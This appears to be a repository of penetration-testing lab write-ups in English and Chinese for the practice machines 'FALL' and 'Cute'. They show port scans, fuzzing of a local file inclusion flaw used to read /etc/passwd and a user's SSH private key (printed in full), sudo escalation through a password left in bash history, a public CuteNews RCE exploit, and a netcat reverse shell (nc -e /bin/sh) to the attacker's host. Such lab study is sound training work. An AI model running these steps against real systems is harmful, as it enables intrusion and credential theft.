whoami 245 | root 246 | hping3> pwd 247 | pwd 248 | /tmp 249 | hping3> 250 | ``` 251 | ##### use netcat to reverse shell for local 252 | ``` 253 | hping3> nc -e /bin/sh 192.168.146.50 4445 254 | nc -e /bin/sh 192.168.146.50 4445 255 | ``` 256 | ##### Finally get root shell 257 | ``` 258 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 259 | └─$ nc -lvnp 4445 260 | listening on [any] 4445 ... 261 | connect to [192.168.146.50] from (UNKNOWN) [192.168.146.75] 57576 262 | id 263 | uid=0(root) gid=0(root) groups=0(root) 264 | /usr/bin/script -qc /bin/bash /dev/null 265 | root@cute:/tmp# cd /root 266 | cd /root 267 | root@cute:~# ls 268 | ls 269 | localweb root.txt 270 | root@cute:~# cat root.txtg 271 | cat root.txtg 272 | cat: root.txtg: No such file or directory 273 | root@cute:~# cat root.txt 274 | cat root.txt 275 | 0b18032c2d06d9e738ede9bc24795ff2 276 | root@cute:~# ip a 277 | ip a 278 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 279 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 280 | inet 127.0.0.1/8 scope host lo 281 | valid_lft forever preferred_lft forever 282 | inet6 ::1/128 scope host 283 | valid_lft forever preferred_lft forever 284 | 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 285 | link/ether 00:0c:29:1b:b0:20 brd ff:ff:ff:ff:ff:ff 286 | inet 192.168.146.75/24 brd 192.168.146.255 scope global dynamic ens33 287 | valid_lft 70362sec preferred_lft 70362sec 288 | inet6 fe80::20c:29ff:fe1b:b020/64 scope link 289 | valid_lft forever preferred_lft forever 290 | root@cute:~# whoami 291 | whoami 292 | root 293 | root@cute:~# 294 | ``` 295 | ![Img](../FILES/Cute/img-20220725120352.png) 296 | 297 | 298 | 299 | -------------------------------------------------------------------------------- /Target Notes-English Version/FALL.md: -------------------------------------------------------------------------------- 1 | # FALL 2 | ## Information Collect 3 | ### NMAP 4 | ``` 5 | └─$ sudo nmap -A -sV -T4 -p- 192.168.146.52 6 | Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-15 10:56 HKT 7 | Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan 8 | NSE Timing: About 99.58% done; ETC: 10:58 (0:00:00 remaining) 9 | Nmap scan report for 192.168.146.52 10 | Host is up (0.00021s latency). 11 | Not shown: 65522 filtered ports 12 | PORT STATE SERVICE VERSION 13 | 22/tcp open ssh OpenSSH 7.8 (protocol 2.0) 14 | | ssh-hostkey: 15 | | 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA) 16 | | 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA) 17 | |_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519) 18 | 80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 19 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 20 | | http-robots.txt: 1 disallowed entry 21 | |_/ 22 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 23 | |_http-title: Good Tech Inc's Fall Sales - Home 24 | 111/tcp closed rpcbind 25 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 26 | 443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3) 27 | |_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved. 28 | | http-robots.txt: 1 disallowed entry 29 | |_/ 30 | |_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3 31 | |_http-title: Good Tech Inc's Fall Sales - Home 32 | | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US 33 | | Subject Alternative Name: DNS:localhost.localdomain 34 | | Not valid before: 2019-08-15T03:51:33 35 | |_Not valid after: 2020-08-19T05:31:33 36 | |_ssl-date: TLS randomness does not represent time 37 | | tls-alpn: 38 | |_ http/1.1 39 | 445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA) 40 | 3306/tcp open mysql MySQL (unauthorized) 41 | 8000/tcp closed http-alt 42 | 8080/tcp closed http-proxy 43 | 8443/tcp closed https-alt 44 | 9090/tcp open http Cockpit web service 162 - 188 45 | |_http-title: Did not follow redirect to https://192.168.146.52:9090/ 46 | 10080/tcp closed amanda 47 | 10443/tcp closed cirrossp 48 | MAC Address: 00:0C:29:43:01:8A (VMware) 49 | Device type: general purpose 50 | Running: Linux 5.X 51 | OS CPE: cpe:/o:linux:linux_kernel:5 52 | OS details: Linux 5.0 - 5.4 53 | Network Distance: 1 hop 54 | Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel 55 | 56 | Host script results: 57 | |_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s 58 | | smb-os-discovery: 59 | | OS: Windows 6.1 (Samba 4.8.10) 60 | | Computer name: fall 61 | | NetBIOS computer name: FALL\x00 62 | | Domain name: \x00 63 | | FQDN: fall 64 | |_ System time: 2022-07-14T19:58:48-07:00 65 | | smb-security-mode: 66 | | account_used: 67 | | authentication_level: user 68 | | challenge_response: supported 69 | |_ message_signing: disabled (dangerous, but default) 70 | | smb2-security-mode: 71 | | 2.02: 72 | |_ Message signing enabled but not required 73 | | smb2-time: 74 | | date: 2022-07-15T02:58:46 75 | |_ start_date: N/A 76 | 77 | TRACEROUTE 78 | HOP RTT ADDRESS 79 | 1 0.21 ms 192.168.146.52 80 | 81 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 82 | Nmap done: 1 IP address (1 host up) scanned in 174.40 seconds 83 | 84 | ``` 85 | ### DIRSEARCH 86 | ``` 87 | dirsearch -u https://192.168.146.52 88 | 89 | _|. _ _ _ _ _ _|_ v0.4.2 90 | (_||| _) (/_(_|| (_| ) 91 | 92 | Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 93 | 94 | Output File: /home/aacai/.dirsearch/reports/192.168.146.52/_22-07-15_11-10-57.txt 95 | 96 | Error Log: /home/aacai/.dirsearch/logs/errors-22-07-15_11-10-57.log 97 | 98 | Target: https://192.168.146.52/ 99 | 100 | [11:10:57] Starting: 101 | [11:10:58] 403 - 220B - /.fishsrv.pl 102 | [11:10:58] 403 - 220B - /.ht_wsr.txt 103 | [11:10:58] 403 - 223B - /.htaccess.bak1 104 | [11:10:58] 403 - 223B - /.htaccess.orig 105 | [11:10:58] 403 - 225B - /.htaccess.sample 106 | 107 | .... 108 | Copy the path to grep 200 status in a txt file 109 | 110 | └─$ cat 80_info.txt | grep "200" 111 | [11:11:03] 200 - 4KB - /admin/login.php 112 | [11:11:07] 200 - 2KB - /assets/ 113 | [11:11:09] 200 - 0B - /config.php 114 | [11:11:11] 200 - 24B - /doc/ 115 | [11:11:12] 200 - 80B - /error.html 116 | [11:11:12] 200 - 1KB - /favicon.ico 117 | [11:11:14] 200 - 8KB - /index.php 118 | [11:11:15] 200 - 24B - /lib/ 119 | [11:11:17] 200 - 3KB - /modules/ 120 | [11:11:19] 200 - 17B - /phpinfo.php 121 | [11:11:22] 200 - 79B - /robots.txt 122 | [11:11:26] 200 - 80B - /test.php 123 | [11:11:26] 200 - 1KB - /tmp/ 124 | [11:11:27] 200 - 0B - /uploads/ 125 | 126 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 127 | └─$ 128 | ``` 129 | ## Web Enumeration 130 | Get the directory of admin 131 |
132 | ![Img](../FILES/FALL/img-20220715111910.png) 133 |
134 | sql injection fails 135 | 136 |
137 | There are no files in the folders in assets 138 | 139 | ![Img](../FILES/FALL/img-20220715112000.png) 140 | 141 |
142 | doc returns no information 143 | ![Img](../FILES/FALL/img-20220715112225.png) 144 |
145 | Only comments with one sentence DUMMY HTML File 146 | 147 |
148 | phpinfo.php also does not return information 149 |
150 | robots.php returns File not Found 151 | 152 |
153 | When accessing test.php 154 |
155 | tell me Missing GET parameter 156 |
157 | ![Img](../FILES/FALL/img-20220715112425.png) 158 |
159 | then try ffuf 160 |
161 | 162 | >ffuf is a web fuzzer tool, which is just a word "fast" when used 163 | But it is not installed by default in kali 164 | Need sudo apt install ffuf to install 165 | 166 | ``` 167 | The dictionary I use in this place is not included by default and needs to be downloaded 168 | You can use sudo apt install seclists 169 | Or download directly from github 170 | https://github.com/danielmiessler/SecLists 171 | Default path /usr/share/seclists 172 | 173 | ┌──(aacai㉿kali)-[/usr/share/wordlists/wfuzz] 174 | └─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u "https://192.168.146.52/test.php?FUZZ=/etc/passwd" -fs 80 1 ⨯ 175 | 176 | /'___\ /'___\ /'___\ 177 | /\ \__/ /\ \__/ __ __ /\ \__/ 178 | \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 179 | \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 180 | \ \_\ \ \_\ \ \____/ \ \_\ 181 | \/_/ \/_/ \/___/ \/_/ 182 | 183 | v1.5.0 Kali Exclusive <3 184 | ________________________________________________ 185 | 186 | :: Method : GET 187 | :: URL : https://192.168.146.52/test.php?FUZZ=/etc/passwd 188 | :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt 189 | :: Follow redirects : false 190 | :: Calibration : false 191 | :: Timeout : 10 192 | :: Threads : 40 193 | :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 194 | :: Filter : Response size: 80 195 | ________________________________________________ 196 | 197 | file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 11ms] 198 | :: Progress: [4712/4712] :: Job [1/1] :: 3126 req/sec :: Duration: [0:00:02] :: Errors: 0 :: 199 | 200 | ``` 201 |
Here you can see that file is used as a get parameter, which means that it has LFI 202 | 203 | ``` 204 | https://192.168.146.52/test.php?file=/etc/passwd 205 | ``` 206 | ![Img](../FILES/FALL/img-20220715115848.png) 207 |
curl to local 208 | 209 | ``` 210 | http://192.168.146.52/test.php?file=/etc/passwd 211 | ``` 212 |
try /root's .ssh key 213 | 214 | ``` 215 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 216 | └─$ curl http://192.168.146.52/test.php?file=/root/.ssh/id_rsa 217 | ``` 218 |
There is no echo, get the information from the web page 219 | ![Img](../FILES/FALL/img-20220715120726.png) 220 |
There is a posted by qiu, this user may be a breaking point 221 | 222 | ``` 223 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 224 | └─$ curl http://192.168.146.52/test.php?file=/home/qiu/.ssh/id_rsa 225 | -----BEGIN OPENSSH PRIVATE KEY----- 226 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn 227 | NhAAAAAwEAAQAAAQEAvNjhOFOSeDHy9K5vnHSs3qTjWNehAPzT0sD3beBPVvYKQJt0AkD0 228 | FDcWTSSF13NhbjCQm5fnzR8td4sjJMYiAl+vAKboHne0njGkBwdy5PgmcXyeZTECIGkggX 229 | 61kImUOIqtLMcjF5ti+09RGiWeSmfIDtTCjj/+uQlokUMtdc4NOv4XGJbp7GdEWBZevien 230 | qXoXtG6j7gUgtXX1Fxlx3FPhxE3lxw/AfZ9ib21JGlOyy8cflTlogrZPoICCXIV/kxGK0d 231 | Zucw8rGGMc6Jv7npeQS1IXU9VnP3LWlOGFU0j+IS5SiNksRfdQ4mCN9SYhAm9mAKcZW8wS 232 | vXuDjWOLEwAAA9AS5tRmEubUZgAAAAdzc2gtcnNhAAABAQC82OE4U5J4MfL0rm+cdKzepO 233 | NY16EA/NPSwPdt4E9W9gpAm3QCQPQUNxZNJIXXc2FuMJCbl+fNHy13iyMkxiICX68Apuge 234 | d7SeMaQHB3Lk+CZxfJ5lMQIgaSCBfrWQiZQ4iq0sxyMXm2L7T1EaJZ5KZ8gO1MKOP/65CW 235 | iRQy11zg06/hcYlunsZ0RYFl6+J6epehe0bqPuBSC1dfUXGXHcU+HETeXHD8B9n2JvbUka 236 | U7LLxx+VOWiCtk+ggIJchX+TEYrR1m5zDysYYxzom/uel5BLUhdT1Wc/ctaU4YVTSP4hLl 237 | KI2SxF91DiYI31JiECb2YApxlbzBK9e4ONY4sTAAAAAwEAAQAAAQArXIEaNdZD0vQ+Sm9G 238 | NWQcGzA4jgph96uLkNM/X2nYRdZEz2zrt45TtfJg9CnnNo8AhhYuI8sNxkLiWAhRwUy9zs 239 | qYE7rohAPs7ukC1CsFeBUbqcmU4pPibUERes6lyXFHKlBpH7BnEz6/BY9RuaGG5B2DikbB 240 | 8t/CDO79q7ccfTZs+gOVRX4PW641+cZxo5/gL3GcdJwDY4ggPwbU/m8sYsyN1NWJ8NH00d 241 | X8THaQAEXAO6TTzPMLgwJi+0kj1UTg+D+nONfh7xeXLseST0m1p+e9C/8rseZsSJSxoXKk 242 | CmDy69aModcpW+ZXl9NcjEwrMvJPLLKjhIUcIhNjf4ABAAAAgEr3ZKUuJquBNFPhEUgUic 243 | ivHoZH6U82VyEY2Bz24qevcVz2IcAXLBLIp+f1oiwYUVMIuWQDw6LSon8S72kk7VWiDrWz 244 | lHjRfpUwWdzdWSMY6PI7EpGVVs0qmRC/TTqOIH+FXA66cFx3X4uOCjkzT0/Es0uNyZ07qQ 245 | 58cGE8cKrLAAAAgQDlPajDRVfDWgOWJj+imXfpGsmo81UDaYXwklzw4VM2SfIHIAFZPaA0 246 | acm4/icKGPlnYWsvZCksvlUck+ti+J2RS2Mq9jmKB0AVZisFazj8qIde3SPPwtR7gBR329 247 | JW3Db+KISMRIvdpJv+eiKQLg/epbSdwXZi0DJoB0a15FsIAQAAAIEA0uQl0d0p3NxCyT/+ 248 | Q6N+llf9TB5+VNjinaGu4DY6qVrSHmhkceHtXxG6h9upRtKw5BvOlSbTatlfMZYUtlZ1mL 249 | RWCU8D7v1Qn7qMflx4bldYgV8lf18sb6g/uztWJuLpFe3Ue/MLgeJ+2TiAw9yYoPVySNK8 250 | uhSHa0dvveoJ8xMAAAAZcWl1QGxvY2FsaG9zdC5sb2NhbGRvbWFpbgEC 251 | -----END OPENSSH PRIVATE KEY----- 252 | 253 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 254 | └─$ 255 | ``` 256 |
257 | Get qiu's ssh key 258 | 259 | ``` 260 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 261 | └─$ ls -al 262 | total 36 263 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 264 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 265 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 266 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 267 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 268 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 269 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 270 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 271 | -rw-r--r-- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 272 | 273 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 274 | └─$ 275 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 276 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 277 | The authenticity of host '192.168.146.52 (192.168.146.52)' can't be established. 278 | ECDSA key fingerprint is SHA256:+P4Rs5s4ipya3/t+GBoy0WjQqL/LaExt9MFvWgld4xc. 279 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 280 | Warning: Permanently added '192.168.146.52' (ECDSA) to the list of known hosts. 281 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 282 | @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ 283 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 284 | Permissions 0644 for 'ssh_rsa' are too open. 285 | It is required that your private key files are NOT accessible by others. 286 | This private key will be ignored. 287 | Load key "ssh_rsa": bad permissions 288 | qiu@192.168.146.52: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). 289 | 290 | ``` 291 |
Incorrect file permissions, modify permissions 292 | 293 | ``` 294 | └─$ sudo chmod 600 ssh_rsa 255 ⨯ 295 | [sudo] password for aacai: 296 | 297 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 298 | └─$ ls -al 299 | total 36 300 | drwxr-xr-x 2 aacai aacai 4096 Jul 15 12:11 . 301 | drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 .. 302 | -rw-r--r-- 1 aacai aacai 3150 Jul 15 11:07 44567.txt 303 | -rw-r--r-- 1 aacai aacai 3446 Jul 15 11:13 49199.txt 304 | -rw-r--r-- 1 aacai aacai 1080 Jul 15 11:09 49345.txt 305 | -rw-r--r-- 1 aacai aacai 1070 Jul 15 11:03 49390.txt 306 | -rw-r--r-- 1 aacai aacai 3596 Jul 15 11:11 80_info.txt 307 | -rw-r--r-- 1 aacai aacai 1633 Jul 15 12:00 passwd.txt 308 | -rw------- 1 aacai aacai 1831 Jul 15 12:11 ssh_rsa 309 | 310 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 311 | └─$ 312 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 313 | └─$ ssh -i ssh_rsa qiu@192.168.146.52 314 | Web console: https://FALL:9090/ or https://192.168.146.52:9090/ 315 | 316 | Last login: Sun Sep 5 19:28:51 2021 317 | [qiu@FALL ~]$ 318 | login successful 319 | ``` 320 | ## Privilege escalation 321 | ``` 322 | [qiu@FALL ~]$ ls -a 323 | . .. .bash_history .bash_logout .bash_profile .bashrc local.txt reminder .ssh 324 | [qiu@FALL ~]$ cat .bash_history 325 | ls -al 326 | cat .bash_history 327 | rm .bash_history 328 | echo "remarkablyawesomE" | sudo -S dnf update 329 | ifconfig 330 | ping www.google.com 331 | ps -aux 332 | ps -ef | grep apache 333 | env 334 | env > env.txt 335 | rm env.txt 336 | lsof -i tcp:445 337 | lsof -i tcp:80 338 | ps -ef 339 | lsof -p 1930 340 | lsof -p 2160 341 | rm .bash_history 342 | exit 343 | ls -al 344 | cat .bash_history 345 | exit 346 | [qiu@FALL ~]$ id 347 | uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel) 348 | [qiu@FALL ~]$ sudo -l 349 | [sudo] password for qiu: 350 | Matching Defaults entries for qiu on FALL: 351 | !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG 352 | LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME 353 | LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", 354 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 355 | 356 | User qiu may run the following commands on FALL: 357 | (ALL) ALL 358 | [qiu@FALL ~]$ 359 | 360 | ``` 361 |
...This privilege escalation is a bit inexplicably simple, and there is a password in .bash_profile 362 |
363 | and sudo can use all permissions 364 | 365 | ``` 366 | [qiu@FALL ~]$ sudo su 367 | [root@FALL qiu]# id 368 | uid=0(root) gid=0(root) groups=0(root) 369 | [root@FALL qiu]# who ami 370 | [root@FALL qiu]# whoami 371 | root 372 | [root@FALL qiu]# ip a 373 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 374 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 375 | inet 127.0.0.1/8 scope host lo 376 | valid_lft forever preferred_lft forever 377 | inet6 ::1/128 scope host 378 | valid_lft forever preferred_lft forever 379 | 2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000 380 | link/ether 00:0c:29:43:01:8a brd ff:ff:ff:ff:ff:ff 381 | inet 192.168.146.52/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33 382 | valid_lft 67037sec preferred_lft 67037sec 383 | inet6 fe80::af86:ce1d:cf2a:e830/64 scope link noprefixroute 384 | valid_lft forever preferred_lft forever 385 | [root@FALL qiu]# cd 386 | [root@FALL ~]# ls 387 | anaconda-ks.cfg original-ks.cfg proof.txt remarks.txt 388 | [root@FALL ~]# cat proof.txt 389 | Congrats on a root shell! :-) 390 | [root@FALL ~]# 391 | 392 | ``` 393 | -------------------------------------------------------------------------------- /Target Notes/Cute.md: -------------------------------------------------------------------------------- 1 | # Cute 2 | ## 信息收集阶段 3 | ### NMAP 4 | #### 全端口扫描 5 | ``` 6 | └─$ sudo nmap -p- 192.168.146.75 7 | [sudo] password for aaron: 8 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT 9 | Nmap scan report for 192.168.146.75 10 | Host is up (0.00020s latency). 11 | Not shown: 65530 closed tcp ports (reset) 12 | PORT STATE SERVICE 13 | 22/tcp open ssh 14 | 80/tcp open http 15 | 88/tcp open kerberos-sec 16 | 110/tcp open pop3 17 | 995/tcp open pop3s 18 | MAC Address: 00:0C:29:1B:B0:20 (VMware) 19 | 20 | Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds 21 | 22 | ``` 23 | #### 指定端口扫描 24 | ``` 25 | └─$ sudo nmap -p22,80,88,110,995 -sV -A 192.168.146.75 26 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT 27 | Nmap scan report for 192.168.146.75 28 | Host is up (0.00042s latency). 29 | 30 | PORT STATE SERVICE VERSION 31 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 32 | | ssh-hostkey: 33 | | 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA) 34 | | 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA) 35 | |_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519) 36 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 37 | |_http-title: Apache2 Debian Default Page: It works 38 | |_http-server-header: Apache/2.4.38 (Debian) 39 | 88/tcp open http nginx 1.14.2 40 | |_http-title: 404 Not Found 41 | |_http-server-header: nginx/1.14.2 42 | 110/tcp open pop3 Courier pop3d 43 | |_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING UIDL USER TOP LOGIN-DELAY(10) STLS 44 | | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US 45 | | Subject Alternative Name: email:postmaster@example.com 46 | | Not valid before: 2020-09-17T16:28:06 47 | |_Not valid after: 2021-09-17T16:28:06 48 | |_ssl-date: TLS randomness does not represent time 49 | 995/tcp open ssl/pop3 Courier pop3d 50 | |_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) PIPELINING UTF8(USER) USER TOP LOGIN-DELAY(10) UIDL 51 | | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US 52 | | Subject Alternative Name: email:postmaster@example.com 53 | | Not valid before: 2020-09-17T16:28:06 54 | |_Not valid after: 2021-09-17T16:28:06 55 | |_ssl-date: TLS randomness does not represent time 56 | MAC Address: 00:0C:29:1B:B0:20 (VMware) 57 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 58 | Device type: general purpose 59 | Running: Linux 4.X|5.X 60 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 61 | OS details: Linux 4.15 - 5.6 62 | Network Distance: 1 hop 63 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 64 | 65 | TRACEROUTE 66 | HOP RTT ADDRESS 67 | 1 0.42 ms 192.168.146.75 68 | 69 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 70 | Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds 71 | ``` 72 | ### Web信息收集 73 | #### Nikto 74 | ``` 75 | └─$ nikto -h 192.168.146.75 76 | - Nikto v2.1.6 77 | --------------------------------------------------------------------------- 78 | + Target IP: 192.168.146.75 79 | + Target Hostname: 192.168.146.75 80 | + Target Port: 80 81 | + Start Time: 2022-07-25 11:44:49 (GMT8) 82 | --------------------------------------------------------------------------- 83 | + Server: Apache/2.4.38 (Debian) 84 | + The anti-clickjacking X-Frame-Options header is not present. 85 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 86 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 87 | + Cookie CUTENEWS_SESSION created without the httponly flag 88 | + No CGI Directories found (use '-C all' to force check all possible dirs) 89 | + Multiple index files found: /index.php, /index.html 90 | + Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5af83f7e950ce, mtime: gzip 91 | + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 92 | + OSVDB-3092: /manual/: Web server manual found. 93 | + OSVDB-3268: /manual/images/: Directory indexing found. 94 | + OSVDB-3092: /LICENSE.txt: License file found may identify site software. 95 | + OSVDB-3233: /icons/README: Apache default file found. 96 | + 7916 requests: 0 error(s) and 11 item(s) reported on remote host 97 | + End Time: 2022-07-25 11:45:40 (GMT8) (51 seconds) 98 | --------------------------------------------------------------------------- 99 | + 1 host(s) tested 100 | ``` 101 | ##### 发现存在index.php 102 | ![Img](../FILES/Cute/img-20220725114624.png) 103 | ##### 能注册用户 104 | ##### 进入注册界面 105 | ![Img](../FILES/Cute/img-20220725114706.png) 106 | ##### 发现验证码找不出来 107 | ##### 打开源码查看一下本页面 108 | ![Img](../FILES/Cute/img-20220725114756.png) 109 | ##### 发现有个captcha.php 110 | ![Img](../FILES/Cute/img-20220725114807.png) 111 | ##### 打开之后发现验证码 112 | ##### 注册成功后登录 113 | ![Img](../FILES/Cute/img-20220725114835.png) 114 | ##### 发现底部的版本号为2.1.2, google搜一下 115 | ![Img](../FILES/Cute/img-20220725114909.png) 116 | ##### 发现本版本有RCE 117 | #### 漏洞利用 118 | ``` 119 | └─$ searchsploit cutenews 2.1.2 120 | ---------------------------------------------------------------------------------------- --------------------------------- 121 | Exploit Title | Path 122 | ---------------------------------------------------------------------------------------- --------------------------------- 123 | CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb 124 | CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt 125 | CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt 126 | CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py 127 | ---------------------------------------------------------------------------------------- --------------------------------- 128 | Shellcodes: No Results 129 | ``` 130 | ##### 在exploit发现有现成的python脚本 131 | ##### 下载下来使用 132 | ``` 133 | └─$ searchsploit -m php/webapps/48800.py 134 | Exploit: CuteNews 2.1.2 - Remote Code Execution 135 | URL: https://www.exploit-db.com/exploits/48800 136 | Path: /usr/share/exploitdb/exploits/php/webapps/48800.py 137 | File Type: Python script, ASCII text executable 138 | 139 | Copied to: /home/aaron/Desktop/Cute-192.168.146.75/48800.py 140 | 141 | 142 | 143 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 144 | └─$ ls 145 | 48800.py LANs.py 146 | └─$ python3 48800.py 147 | 148 | 149 | 150 | _____ __ _ __ ___ ___ ___ 151 | / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | 152 | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ 153 | \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ 154 | ___ _________ 155 | / _ \/ ___/ __/ 156 | / , _/ /__/ _/ 157 | /_/|_|\___/___/ 158 | 159 | 160 | 161 | 162 | [->] Usage python3 expoit.py 163 | 164 | Enter the URL> http://192.168.146.75/ 165 | ================================================================ 166 | Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN 167 | ================================================================ 168 | [-] No hashes were found skipping!!! 169 | ================================================================ 170 | 171 | ============================= 172 | Registering a users 173 | ============================= 174 | 175 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 176 | └─$ 177 | 178 | ``` 179 | ##### 但是发现不能执行, 查看一下漏洞利用代码 180 | ![Img](../FILES/Cute/img-20220725115151.png) 181 | ##### 发现我们没有这个目录, 把EXP里面所有的目录去掉试试 182 | 重新执行 183 | ![Img](../FILES/Cute/img-20220725115318.png) 184 | ##### 发现可以执行 185 | ``` 186 | command > whoami 187 | www-data 188 | 189 | command > ls 190 | avatar_55Y2xTic4I_55Y2xTic4I.php 191 | avatar_ET3TpbEJQk_ET3TpbEJQk.php 192 | avatar_IgJLU8OSMX_IgJLU8OSMX.php 193 | avatar_PoKxESSE4D_PoKxESSE4D.php 194 | avatar_RvFcklLkzE_RvFcklLkzE.php 195 | avatar_VvgU5CZIce_VvgU5CZIce.php 196 | avatar_cruDW9A0zh_cruDW9A0zh.php 197 | avatar_rwRemM6TLd_message2.jpg 198 | index.html 199 | ``` 200 | ##### 